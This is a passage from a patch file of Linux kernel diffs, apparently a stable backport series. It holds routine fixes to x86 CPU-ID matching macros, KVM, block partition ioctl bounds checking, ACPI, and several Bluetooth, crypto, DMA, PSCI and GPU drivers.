++#define __do_outsl(p, b, n)	writesl((PCI_IO_ADDR)(_IO_BASE+(p)),(b),(n))
+ 
+ #define __do_memset_io(addr, c, n)	\
+ 				_memset_io(PCI_FIX_ADDR(addr), c, n)
+diff --git a/arch/x86/include/asm/cpu_device_id.h b/arch/x86/include/asm/cpu_device_id.h
+index eb8fcede9e3bf..e8e3dbe7f1730 100644
+--- a/arch/x86/include/asm/cpu_device_id.h
++++ b/arch/x86/include/asm/cpu_device_id.h
+@@ -2,6 +2,39 @@
+ #ifndef _ASM_X86_CPU_DEVICE_ID
+ #define _ASM_X86_CPU_DEVICE_ID
+ 
++/*
++ * Can't use <linux/bitfield.h> because it generates expressions that
++ * cannot be used in structure initializers. Bitfield construction
++ * here must match the union in struct cpuinfo_86:
++ *	union {
++ *		struct {
++ *			__u8	x86_model;
++ *			__u8	x86;
++ *			__u8	x86_vendor;
++ *			__u8	x86_reserved;
++ *		};
++ *		__u32		x86_vfm;
++ *	};
++ */
++#define VFM_MODEL_BIT	0
++#define VFM_FAMILY_BIT	8
++#define VFM_VENDOR_BIT	16
++#define VFM_RSVD_BIT	24
++
++#define	VFM_MODEL_MASK	GENMASK(VFM_FAMILY_BIT - 1, VFM_MODEL_BIT)
++#define	VFM_FAMILY_MASK	GENMASK(VFM_VENDOR_BIT - 1, VFM_FAMILY_BIT)
++#define	VFM_VENDOR_MASK	GENMASK(VFM_RSVD_BIT - 1, VFM_VENDOR_BIT)
++
++#define VFM_MODEL(vfm)	(((vfm) & VFM_MODEL_MASK) >> VFM_MODEL_BIT)
++#define VFM_FAMILY(vfm)	(((vfm) & VFM_FAMILY_MASK) >> VFM_FAMILY_BIT)
++#define VFM_VENDOR(vfm)	(((vfm) & VFM_VENDOR_MASK) >> VFM_VENDOR_BIT)
++
++#define	VFM_MAKE(_vendor, _family, _model) (	\
++	((_model) << VFM_MODEL_BIT) |		\
++	((_family) << VFM_FAMILY_BIT) |		\
++	((_vendor) << VFM_VENDOR_BIT)		\
++)
++
+ /*
+  * Declare drivers belonging to specific x86 CPUs
+  * Similar in spirit to pci_device_id and related PCI functions
+@@ -20,6 +53,9 @@
+ #define X86_CENTAUR_FAM6_C7_D		0xd
+ #define X86_CENTAUR_FAM6_NANO		0xf
+ 
++/* x86_cpu_id::flags */
++#define X86_CPU_ID_FLAG_ENTRY_VALID	BIT(0)
++
+ #define X86_STEPPINGS(mins, maxs)    GENMASK(maxs, mins)
+ /**
+  * X86_MATCH_VENDOR_FAM_MODEL_STEPPINGS_FEATURE - Base macro for CPU matching
+@@ -46,6 +82,18 @@
+ 	.model		= _model,					\
+ 	.steppings	= _steppings,					\
+ 	.feature	= _feature,					\
++	.flags		= X86_CPU_ID_FLAG_ENTRY_VALID,			\
++	.driver_data	= (unsigned long) _data				\
++}
++
++#define X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(_vendor, _family, _model, \
++						    _steppings, _feature, _data) { \
++	.vendor		= _vendor,					\
++	.family		= _family,					\
++	.model		= _model,					\
++	.steppings	= _steppings,					\
++	.feature	= _feature,					\
++	.flags		= X86_CPU_ID_FLAG_ENTRY_VALID,			\
+ 	.driver_data	= (unsigned long) _data				\
+ }
+ 
+@@ -164,6 +212,56 @@
+ 	X86_MATCH_VENDOR_FAM_MODEL_STEPPINGS_FEATURE(INTEL, 6, INTEL_FAM6_##model, \
+ 						     steppings, X86_FEATURE_ANY, data)
+ 
++/**
++ * X86_MATCH_VFM - Match encoded vendor/family/model
++ * @vfm:	Encoded 8-bits each for vendor, family, model
++ * @data:	Driver specific data or NULL. The internal storage
++ *		format is unsigned long. The supplied value, pointer
++ *		etc. is cast to unsigned long internally.
++ *
++ * Stepping and feature are set to wildcards
++ */
++#define X86_MATCH_VFM(vfm, data)			\
++	X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(	\
++		VFM_VENDOR(vfm),			\
++		VFM_FAMILY(vfm),			\
++		VFM_MODEL(vfm),				\
++		X86_STEPPING_ANY, X86_FEATURE_ANY, data)
++
++/**
++ * X86_MATCH_VFM_STEPPINGS - Match encoded vendor/family/model/stepping
++ * @vfm:	Encoded 8-bits each for vendor, family, model
++ * @steppings:	Bitmask of steppings to match
++ * @data:	Driver specific data or NULL. The internal storage
++ *		format is unsigned long. The supplied value, pointer
++ *		etc. is cast to unsigned long internally.
++ *
++ * feature is set to wildcard
++ */
++#define X86_MATCH_VFM_STEPPINGS(vfm, steppings, data)	\
++	X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(	\
++		VFM_VENDOR(vfm),			\
++		VFM_FAMILY(vfm),			\
++		VFM_MODEL(vfm),				\
++		steppings, X86_FEATURE_ANY, data)
++
++/**
++ * X86_MATCH_VFM_FEATURE - Match encoded vendor/family/model/feature
++ * @vfm:	Encoded 8-bits each for vendor, family, model
++ * @feature:	A X86_FEATURE bit
++ * @data:	Driver specific data or NULL. The internal storage
++ *		format is unsigned long. The supplied value, pointer
++ *		etc. is cast to unsigned long internally.
++ *
++ * Steppings is set to wildcard
++ */
++#define X86_MATCH_VFM_FEATURE(vfm, feature, data)	\
++	X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(	\
++		VFM_VENDOR(vfm),			\
++		VFM_FAMILY(vfm),			\
++		VFM_MODEL(vfm),				\
++		X86_STEPPING_ANY, feature, data)
++
+ /*
+  * Match specific microcode revisions.
+  *
+diff --git a/arch/x86/kernel/cpu/match.c b/arch/x86/kernel/cpu/match.c
+index ad6776081e60d..ae71b8ef909c9 100644
+--- a/arch/x86/kernel/cpu/match.c
++++ b/arch/x86/kernel/cpu/match.c
+@@ -39,9 +39,7 @@ const struct x86_cpu_id *x86_match_cpu(const struct x86_cpu_id *match)
+ 	const struct x86_cpu_id *m;
+ 	struct cpuinfo_x86 *c = &boot_cpu_data;
+ 
+-	for (m = match;
+-	     m->vendor | m->family | m->model | m->steppings | m->feature;
+-	     m++) {
++	for (m = match; m->flags & X86_CPU_ID_FLAG_ENTRY_VALID; m++) {
+ 		if (m->vendor != X86_VENDOR_ANY && c->x86_vendor != m->vendor)
+ 			continue;
+ 		if (m->family != X86_FAMILY_ANY && c->x86 != m->family)
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index a2ea636a23086..53d83b37db8c8 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -10523,13 +10523,12 @@ static void vcpu_scan_ioapic(struct kvm_vcpu *vcpu)
+ 
+ 	bitmap_zero(vcpu->arch.ioapic_handled_vectors, 256);
+ 
++	static_call_cond(kvm_x86_sync_pir_to_irr)(vcpu);
++
+ 	if (irqchip_split(vcpu->kvm))
+ 		kvm_scan_ioapic_routes(vcpu, vcpu->arch.ioapic_handled_vectors);
+-	else {
+-		static_call_cond(kvm_x86_sync_pir_to_irr)(vcpu);
+-		if (ioapic_in_kernel(vcpu->kvm))
+-			kvm_ioapic_scan_entry(vcpu, vcpu->arch.ioapic_handled_vectors);
+-	}
++	else if (ioapic_in_kernel(vcpu->kvm))
++		kvm_ioapic_scan_entry(vcpu, vcpu->arch.ioapic_handled_vectors);
+ 
+ 	if (is_guest_mode(vcpu))
+ 		vcpu->arch.load_eoi_exitmap_pending = true;
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 99b8e2e448729..c7390d8c9fc73 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -33,7 +33,7 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	if (op == BLKPG_DEL_PARTITION)
+ 		return bdev_del_partition(disk, p.pno);
+ 
+-	if (p.start < 0 || p.length <= 0 || p.start + p.length < 0)
++	if (p.start < 0 || p.length <= 0 || LLONG_MAX - p.length < p.start)
+ 		return -EINVAL;
+ 	/* Check that the partition is aligned to the block size */
+ 	if (!IS_ALIGNED(p.start | p.length, bdev_logical_block_size(bdev)))
+diff --git a/drivers/acpi/acpica/exregion.c b/drivers/acpi/acpica/exregion.c
+index 4ff35852c0b38..8906aa4464054 100644
+--- a/drivers/acpi/acpica/exregion.c
++++ b/drivers/acpi/acpica/exregion.c
+@@ -44,7 +44,6 @@ acpi_ex_system_memory_space_handler(u32 function,
+ 	struct acpi_mem_mapping *mm = mem_info->cur_mm;
+ 	u32 length;
+ 	acpi_size map_length;
+-	acpi_size page_boundary_map_length;
+ #ifdef ACPI_MISALIGNMENT_NOT_SUPPORTED
+ 	u32 remainder;
+ #endif
+@@ -138,26 +137,8 @@ acpi_ex_system_memory_space_handler(u32 function,
+ 		map_length = (acpi_size)
+ 		    ((mem_info->address + mem_info->length) - address);
+ 
+-		/*
+-		 * If mapping the entire remaining portion of the region will cross
+-		 * a page boundary, just map up to the page boundary, do not cross.
+-		 * On some systems, crossing a page boundary while mapping regions
+-		 * can cause warnings if the pages have different attributes
+-		 * due to resource management.
+-		 *
+-		 * This has the added benefit of constraining a single mapping to
+-		 * one page, which is similar to the original code that used a 4k
+-		 * maximum window.
+-		 */
+-		page_boundary_map_length = (acpi_size)
+-		    (ACPI_ROUND_UP(address, ACPI_DEFAULT_PAGE_SIZE) - address);
+-		if (page_boundary_map_length == 0) {
+-			page_boundary_map_length = ACPI_DEFAULT_PAGE_SIZE;
+-		}
+-
+-		if (map_length > page_boundary_map_length) {
+-			map_length = page_boundary_map_length;
+-		}
++		if (map_length > ACPI_DEFAULT_PAGE_SIZE)
++			map_length = ACPI_DEFAULT_PAGE_SIZE;
+ 
+ 		/* Create a new mapping starting at the address given */
+ 
+diff --git a/drivers/bluetooth/ath3k.c b/drivers/bluetooth/ath3k.c
+index 88262d3a93923..ce97b336fbfb8 100644
+--- a/drivers/bluetooth/ath3k.c
++++ b/drivers/bluetooth/ath3k.c
+@@ -3,7 +3,6 @@
+  * Copyright (c) 2008-2009 Atheros Communications Inc.
+  */
+ 
+-
+ #include <linux/module.h>
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+@@ -128,7 +127,6 @@ MODULE_DEVICE_TABLE(usb, ath3k_table);
+  * for AR3012
+  */
+ static const struct usb_device_id ath3k_blist_tbl[] = {
+-
+ 	/* Atheros AR3012 with sflash firmware*/
+ 	{ USB_DEVICE(0x0489, 0xe04e), .driver_info = BTUSB_ATH3012 },
+ 	{ USB_DEVICE(0x0489, 0xe04d), .driver_info = BTUSB_ATH3012 },
+@@ -202,7 +200,7 @@ static inline void ath3k_log_failed_loading(int err, int len, int size,
+ #define TIMEGAP_USEC_MAX	100
+ 
+ static int ath3k_load_firmware(struct usb_device *udev,
+-				const struct firmware *firmware)
++			       const struct firmware *firmware)
+ {
+ 	u8 *send_buf;
+ 	int len = 0;
+@@ -237,9 +235,9 @@ static int ath3k_load_firmware(struct usb_device *udev,
+ 		memcpy(send_buf, firmware->data + sent, size);
+ 
+ 		err = usb_bulk_msg(udev, pipe, send_buf, size,
+-					&len, 3000);
++				   &len, 3000);
+ 
+-		if (err || (len != size)) {
++		if (err || len != size) {
+ 			ath3k_log_failed_loading(err, len, size, count);
+ 			goto error;
+ 		}
+@@ -262,7 +260,7 @@ static int ath3k_get_state(struct usb_device *udev, unsigned char *state)
+ }
+ 
+ static int ath3k_get_version(struct usb_device *udev,
+-			struct ath3k_version *version)
++			     struct ath3k_version *version)
+ {
+ 	return usb_control_msg_recv(udev, 0, ATH3K_GETVERSION,
+ 				    USB_TYPE_VENDOR | USB_DIR_IN, 0, 0,
+@@ -271,7 +269,7 @@ static int ath3k_get_version(struct usb_device *udev,
+ }
+ 
+ static int ath3k_load_fwfile(struct usb_device *udev,
+-		const struct firmware *firmware)
++			     const struct firmware *firmware)
+ {
+ 	u8 *send_buf;
+ 	int len = 0;
+@@ -310,8 +308,8 @@ static int ath3k_load_fwfile(struct usb_device *udev,
+ 		memcpy(send_buf, firmware->data + sent, size);
+ 
+ 		err = usb_bulk_msg(udev, pipe, send_buf, size,
+-					&len, 3000);
+-		if (err || (len != size)) {
++				   &len, 3000);
++		if (err || len != size) {
+ 			ath3k_log_failed_loading(err, len, size, count);
+ 			kfree(send_buf);
+ 			return err;
+@@ -425,7 +423,6 @@ static int ath3k_load_syscfg(struct usb_device *udev)
+ 	}
+ 
+ 	switch (fw_version.ref_clock) {
+-
+ 	case ATH3K_XTAL_FREQ_26M:
+ 		clk_value = 26;
+ 		break;
+@@ -441,7 +438,7 @@ static int ath3k_load_syscfg(struct usb_device *udev)
+ 	}
+ 
+ 	snprintf(filename, ATH3K_NAME_LEN, "ar3k/ramps_0x%08x_%d%s",
+-		le32_to_cpu(fw_version.rom_version), clk_value, ".dfu");
++		 le32_to_cpu(fw_version.rom_version), clk_value, ".dfu");
+ 
+ 	ret = request_firmware(&firmware, filename, &udev->dev);
+ 	if (ret < 0) {
+@@ -456,7 +453,7 @@ static int ath3k_load_syscfg(struct usb_device *udev)
+ }
+ 
+ static int ath3k_probe(struct usb_interface *intf,
+-			const struct usb_device_id *id)
++		       const struct usb_device_id *id)
+ {
+ 	const struct firmware *firmware;
+ 	struct usb_device *udev = interface_to_usbdev(intf);
+@@ -505,10 +502,10 @@ static int ath3k_probe(struct usb_interface *intf,
+ 	if (ret < 0) {
+ 		if (ret == -ENOENT)
+ 			BT_ERR("Firmware file \"%s\" not found",
+-							ATH3K_FIRMWARE);
++			       ATH3K_FIRMWARE);
+ 		else
+ 			BT_ERR("Firmware file \"%s\" request failed (err=%d)",
+-							ATH3K_FIRMWARE, ret);
++			       ATH3K_FIRMWARE, ret);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/crypto/hisilicon/sec2/sec_crypto.c b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+index cae7c414bdaf4..09a20307d01e3 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_crypto.c
++++ b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+@@ -479,8 +479,10 @@ static void sec_alg_resource_free(struct sec_ctx *ctx,
+ 
+ 	if (ctx->pbuf_supported)
+ 		sec_free_pbuf_resource(dev, qp_ctx->res);
+-	if (ctx->alg_type == SEC_AEAD)
++	if (ctx->alg_type == SEC_AEAD) {
+ 		sec_free_mac_resource(dev, qp_ctx->res);
++		sec_free_aiv_resource(dev, qp_ctx->res);
++	}
+ }
+ 
+ static int sec_alloc_qp_ctx_resource(struct hisi_qm *qm, struct sec_ctx *ctx,
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index 152c5d98524d7..7596864bf8bb2 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -250,6 +250,7 @@ static struct axi_dma_desc *axi_desc_alloc(u32 num)
+ 		kfree(desc);
+ 		return NULL;
+ 	}
++	desc->nr_hw_descs = num;
+ 
+ 	return desc;
+ }
+@@ -276,7 +277,7 @@ static struct axi_dma_lli *axi_desc_get(struct axi_dma_chan *chan,
+ static void axi_desc_put(struct axi_dma_desc *desc)
+ {
+ 	struct axi_dma_chan *chan = desc->chan;
+-	int count = atomic_read(&chan->descs_allocated);
++	int count = desc->nr_hw_descs;
+ 	struct axi_dma_hw_desc *hw_desc;
+ 	int descs_put;
+ 
+@@ -1087,9 +1088,6 @@ static void axi_chan_block_xfer_complete(struct axi_dma_chan *chan)
+ 		/* Remove the completed descriptor from issued list before completing */
+ 		list_del(&vd->node);
+ 		vchan_cookie_complete(vd);
+-
+-		/* Submit queued descriptors after processing the completed ones */
+-		axi_chan_start_first_queued(chan);
+ 	}
+ 
+ out:
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac.h b/drivers/dma/dw-axi-dmac/dw-axi-dmac.h
+index e9d5eb0fd5948..764427a66f5e8 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac.h
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac.h
+@@ -103,6 +103,7 @@ struct axi_dma_desc {
+ 	u32				completed_blocks;
+ 	u32				length;
+ 	u32				period_len;
++	u32				nr_hw_descs;
+ };
+ 
+ struct axi_dma_chan_config {
+diff --git a/drivers/dma/idxd/irq.c b/drivers/dma/idxd/irq.c
+index aa314ebec5878..4a3eb96b8199a 100644
+--- a/drivers/dma/idxd/irq.c
++++ b/drivers/dma/idxd/irq.c
+@@ -454,11 +454,13 @@ static void irq_process_work_list(struct idxd_irq_entry *irq_entry)
+ 
+ 	spin_unlock(&irq_entry->list_lock);
+ 
+-	list_for_each_entry(desc, &flist, list) {
++	list_for_each_entry_safe(desc, n, &flist, list) {
+ 		/*
+ 		 * Check against the original status as ABORT is software defined
+ 		 * and 0xff, which DSA_COMP_STATUS_MASK can mask out.
+ 		 */
++		list_del(&desc->list);
++
+ 		if (unlikely(desc->completion->status == IDXD_COMP_DESC_ABORT)) {
+ 			idxd_dma_complete_txd(desc, IDXD_COMPLETE_ABORT, true);
+ 			continue;
+diff --git a/drivers/dma/ioat/init.c b/drivers/dma/ioat/init.c
+index 5d707ff635542..ec8b2b5e4ef00 100644
+--- a/drivers/dma/ioat/init.c
++++ b/drivers/dma/ioat/init.c
+@@ -15,7 +15,6 @@
+ #include <linux/workqueue.h>
+ #include <linux/prefetch.h>
+ #include <linux/dca.h>
+-#include <linux/aer.h>
+ #include <linux/sizes.h>
+ #include "dma.h"
+ #include "registers.h"
+@@ -535,18 +534,6 @@ static int ioat_probe(struct ioatdma_device *ioat_dma)
+ 	return err;
+ }
+ 
+-static int ioat_register(struct ioatdma_device *ioat_dma)
+-{
+-	int err = dma_async_device_register(&ioat_dma->dma_dev);
+-
+-	if (err) {
+-		ioat_disable_interrupts(ioat_dma);
+-		dma_pool_destroy(ioat_dma->completion_pool);
+-	}
+-
+-	return err;
+-}
+-
+ static void ioat_dma_remove(struct ioatdma_device *ioat_dma)
+ {
+ 	struct dma_device *dma = &ioat_dma->dma_dev;
+@@ -1181,9 +1168,9 @@ static int ioat3_dma_probe(struct ioatdma_device *ioat_dma, int dca)
+ 		       ioat_chan->reg_base + IOAT_DCACTRL_OFFSET);
+ 	}
+ 
+-	err = ioat_register(ioat_dma);
++	err = dma_async_device_register(&ioat_dma->dma_dev);
+ 	if (err)
+-		return err;
++		goto err_disable_interrupts;
+ 
+ 	ioat_kobject_add(ioat_dma, &ioat_ktype);
+ 
+@@ -1191,21 +1178,30 @@ static int ioat3_dma_probe(struct ioatdma_device *ioat_dma, int dca)
+ 		ioat_dma->dca = ioat_dca_init(pdev, ioat_dma->reg_base);
+ 
+ 	/* disable relaxed ordering */
+-	err = pcie_capability_read_word(pdev, IOAT_DEVCTRL_OFFSET, &val16);
+-	if (err)
+-		return pcibios_err_to_errno(err);
++	err = pcie_capability_read_word(pdev, PCI_EXP_DEVCTL, &val16);
++	if (err) {
++		err = pcibios_err_to_errno(err);
++		goto err_disable_interrupts;
++	}
+ 
+ 	/* clear relaxed ordering enable */
+-	val16 &= ~IOAT_DEVCTRL_ROE;
+-	err = pcie_capability_write_word(pdev, IOAT_DEVCTRL_OFFSET, val16);
+-	if (err)
+-		return pcibios_err_to_errno(err);
++	val16 &= ~PCI_EXP_DEVCTL_RELAX_EN;
++	err = pcie_capability_write_word(pdev, PCI_EXP_DEVCTL, val16);
++	if (err) {
++		err = pcibios_err_to_errno(err);
++		goto err_disable_interrupts;
++	}
+ 
+ 	if (ioat_dma->cap & IOAT_CAP_DPS)
+ 		writeb(ioat_pending_level + 1,
+ 		       ioat_dma->reg_base + IOAT_PREFETCH_LIMIT_OFFSET);
+ 
+ 	return 0;
++
++err_disable_interrupts:
++	ioat_disable_interrupts(ioat_dma);
++	dma_pool_destroy(ioat_dma->completion_pool);
++	return err;
+ }
+ 
+ static void ioat_shutdown(struct pci_dev *pdev)
+@@ -1350,6 +1346,8 @@ static int ioat_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	void __iomem * const *iomap;
+ 	struct device *dev = &pdev->dev;
+ 	struct ioatdma_device *device;
++	unsigned int i;
++	u8 version;
+ 	int err;
+ 
+ 	err = pcim_enable_device(pdev);
+@@ -1363,6 +1361,10 @@ static int ioat_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (!iomap)
+ 		return -ENOMEM;
+ 
++	version = readb(iomap[IOAT_MMIO_BAR] + IOAT_VER_OFFSET);
++	if (version < IOAT_VER_3_0)
++		return -ENODEV;
++
+ 	err = dma_set_mask_and_coherent(&pdev->dev, DMA_BIT_MASK(64));
+ 	if (err)
+ 		return err;
+@@ -1373,22 +1375,19 @@ static int ioat_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	pci_set_master(pdev);
+ 	pci_set_drvdata(pdev, device);
+ 
+-	device->version = readb(device->reg_base + IOAT_VER_OFFSET);
++	device->version = version;
+ 	if (device->version >= IOAT_VER_3_4)
+ 		ioat_dca_enabled = 0;
+-	if (device->version >= IOAT_VER_3_0) {
+-		if (is_skx_ioat(pdev))
+-			device->version = IOAT_VER_3_2;
+-		err = ioat3_dma_probe(device, ioat_dca_enabled);
+-
+-		if (device->version >= IOAT_VER_3_3)
+-			pci_enable_pcie_error_reporting(pdev);
+-	} else
+-		return -ENODEV;
+ 
++	if (is_skx_ioat(pdev))
++		device->version = IOAT_VER_3_2;
++
++	err = ioat3_dma_probe(device, ioat_dca_enabled);
+ 	if (err) {
++		for (i = 0; i < IOAT_MAX_CHANS; i++)
++			kfree(device->idx[i]);
++		kfree(device);
+ 		dev_err(dev, "Intel(R) I/OAT DMA Engine init failed\n");
+-		pci_disable_pcie_error_reporting(pdev);
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1411,7 +1410,6 @@ static void ioat_remove(struct pci_dev *pdev)
+ 		device->dca = NULL;
+ 	}
+ 
+-	pci_disable_pcie_error_reporting(pdev);
+ 	ioat_dma_remove(device);
+ }
+ 
+@@ -1450,6 +1448,7 @@ module_init(ioat_init_module);
+ static void __exit ioat_exit_module(void)
+ {
+ 	pci_unregister_driver(&ioat_pci_driver);
++	kmem_cache_destroy(ioat_sed_cache);
+ 	kmem_cache_destroy(ioat_cache);
+ }
+ module_exit(ioat_exit_module);
+diff --git a/drivers/dma/ioat/registers.h b/drivers/dma/ioat/registers.h
+index f55a5f92f1857..54cf0ad39887b 100644
+--- a/drivers/dma/ioat/registers.h
++++ b/drivers/dma/ioat/registers.h
+@@ -14,13 +14,6 @@
+ #define IOAT_PCI_CHANERR_INT_OFFSET		0x180
+ #define IOAT_PCI_CHANERRMASK_INT_OFFSET		0x184
+ 
+-/* PCIe config registers */
+-
+-/* EXPCAPID + N */
+-#define IOAT_DEVCTRL_OFFSET			0x8
+-/* relaxed ordering enable */
+-#define IOAT_DEVCTRL_ROE			0x10
+-
+ /* MMIO Device Registers */
+ #define IOAT_CHANCNT_OFFSET			0x00	/*  8-bit */
+ 
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index f78249fe2512a..a44ba09e49d9c 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -485,10 +485,12 @@ int psci_cpu_suspend_enter(u32 state)
+ 
+ static int psci_system_suspend(unsigned long unused)
+ {
++	int err;
+ 	phys_addr_t pa_cpu_resume = __pa_symbol(cpu_resume);
+ 
+-	return invoke_psci_fn(PSCI_FN_NATIVE(1_0, SYSTEM_SUSPEND),
++	err = invoke_psci_fn(PSCI_FN_NATIVE(1_0, SYSTEM_SUSPEND),
+ 			      pa_cpu_resume, 0, 0);
++	return psci_to_linux_errno(err);
+ }
+ 
+ static int psci_system_suspend_enter(suspend_state_t state)
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+index d17bfa111aa74..a24f3b35ae914 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+@@ -164,6 +164,8 @@ static void sumo_construct_vid_mapping_table(struct amdgpu_device *adev,
+ 
+ 	for (i = 0; i < SUMO_MAX_HARDWARE_POWERLEVELS; i++) {
+ 		if (table[i].ulSupportedSCLK != 0) {
++			if (table[i].usVoltageIndex >= SUMO_MAX_NUMBER_VOLTAGES)
++				continue;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_7bit =
+ 				table[i].usVoltageID;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_2bit =
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 4699c21102261..a27563bfd9097 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -390,6 +390,10 @@ bool intel_dp_can_bigjoiner(struct intel_dp *intel_dp)
+ 	struct intel_encoder *encoder = &intel_dig_port->base;
+ 	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+ 
++	/* eDP MSO is not compatible with joiner */
++	if (intel_dp->mso_link_count)
++		return false;
++
+ 	return DISPLAY_VER(dev_priv) >= 12 ||
+ 		(DISPLAY_VER(dev_priv) == 11 &&
+ 		 encoder->port != PORT_A);
+diff --git a/drivers/gpu/drm/lima/lima_bcast.c b/drivers/gpu/drm/lima/lima_bcast.c
+index fbc43f243c54d..6d000504e1a4e 100644
+--- a/drivers/gpu/drm/lima/lima_bcast.c
++++ b/drivers/gpu/drm/lima/lima_bcast.c
+@@ -43,6 +43,18 @@ void lima_bcast_suspend(struct lima_ip *ip)
+ 
+ }
+ 
++int lima_bcast_mask_irq(struct lima_ip *ip)
++{
++	bcast_write(LIMA_BCAST_BROADCAST_MASK, 0);
++	bcast_write(LIMA_BCAST_INTERRUPT_MASK, 0);
++	return 0;
++}
++
++int lima_bcast_reset(struct lima_ip *ip)
++{
++	return lima_bcast_hw_init(ip);
++}
++
+ int lima_bcast_init(struct lima_ip *ip)
+ {
+ 	int i;
+diff --git a/drivers/gpu/drm/lima/lima_bcast.h b/drivers/gpu/drm/lima/lima_bcast.h
+index 465ee587bceb2..cd08841e47879 100644
+--- a/drivers/gpu/drm/lima/lima_bcast.h
++++ b/drivers/gpu/drm/lima/lima_bcast.h
+@@ -13,4 +13,7 @@ void lima_bcast_fini(struct lima_ip *ip);
+ 
+ void lima_bcast_enable(struct lima_device *dev, int num_pp);
+ 
++int lima_bcast_mask_irq(struct lima_ip *ip);
++int lima_bcast_reset(struct lima_ip *ip);
++
+ #endif
+diff --git a/drivers/gpu/drm/lima/lima_gp.c b/drivers/gpu/drm/lima/lima_gp.c
+index 8dd501b7a3d0d..6cf46b653e810 100644
+--- a/drivers/gpu/drm/lima/lima_gp.c
++++ b/drivers/gpu/drm/lima/lima_gp.c
+@@ -212,6 +212,13 @@ static void lima_gp_task_mmu_error(struct lima_sched_pipe *pipe)
+ 	lima_sched_pipe_task_done(pipe);
+ }
+ 
++static void lima_gp_task_mask_irq(struct lima_sched_pipe *pipe)
++{
++	struct lima_ip *ip = pipe->processor[0];
++
++	gp_write(LIMA_GP_INT_MASK, 0);
++}
++
+ static int lima_gp_task_recover(struct lima_sched_pipe *pipe)
+ {
+ 	struct lima_ip *ip = pipe->processor[0];
+@@ -344,6 +351,7 @@ int lima_gp_pipe_init(struct lima_device *dev)
+ 	pipe->task_error = lima_gp_task_error;
+ 	pipe->task_mmu_error = lima_gp_task_mmu_error;
+ 	pipe->task_recover = lima_gp_task_recover;
++	pipe->task_mask_irq = lima_gp_task_mask_irq;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/lima/lima_pp.c b/drivers/gpu/drm/lima/lima_pp.c
+index a5c95bed08c09..54b208a4a768e 100644
+--- a/drivers/gpu/drm/lima/lima_pp.c
++++ b/drivers/gpu/drm/lima/lima_pp.c
+@@ -408,6 +408,9 @@ static void lima_pp_task_error(struct lima_sched_pipe *pipe)
+ 
+ 		lima_pp_hard_reset(ip);
+ 	}
++
++	if (pipe->bcast_processor)
++		lima_bcast_reset(pipe->bcast_processor);
+ }
+ 
+ static void lima_pp_task_mmu_error(struct lima_sched_pipe *pipe)
+@@ -416,6 +419,20 @@ static void lima_pp_task_mmu_error(struct lima_sched_pipe *pipe)
+ 		lima_sched_pipe_task_done(pipe);
+ }
+ 
++static void lima_pp_task_mask_irq(struct lima_sched_pipe *pipe)
++{
++	int i;
++
++	for (i = 0; i < pipe->num_processor; i++) {
++		struct lima_ip *ip = pipe->processor[i];
++
++		pp_write(LIMA_PP_INT_MASK, 0);
++	}
++
++	if (pipe->bcast_processor)
++		lima_bcast_mask_irq(pipe->bcast_processor);
++}
++
+ static struct kmem_cache *lima_pp_task_slab;
+ static int lima_pp_task_slab_refcnt;
+ 
+@@ -447,6 +464,7 @@ int lima_pp_pipe_init(struct lima_device *dev)
+ 	pipe->task_fini = lima_pp_task_fini;
+ 	pipe->task_error = lima_pp_task_error;
+ 	pipe->task_mmu_error = lima_pp_task_mmu_error;
++	pipe->task_mask_irq = lima_pp_task_mask_irq;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/lima/lima_sched.c b/drivers/gpu/drm/lima/lima_sched.c
+index e82931712d8a2..9e836fad4a654 100644
+--- a/drivers/gpu/drm/lima/lima_sched.c
++++ b/drivers/gpu/drm/lima/lima_sched.c
+@@ -402,6 +402,13 @@ static enum drm_gpu_sched_stat lima_sched_timedout_job(struct drm_sched_job *job
+ 	struct lima_sched_task *task = to_lima_task(job);
+ 	struct lima_device *ldev = pipe->ldev;
+ 
++	/*
++	 * The task might still finish while this timeout handler runs.
++	 * To prevent a race condition on its completion, mask all irqs
++	 * on the running core until the next hard reset completes.
++	 */
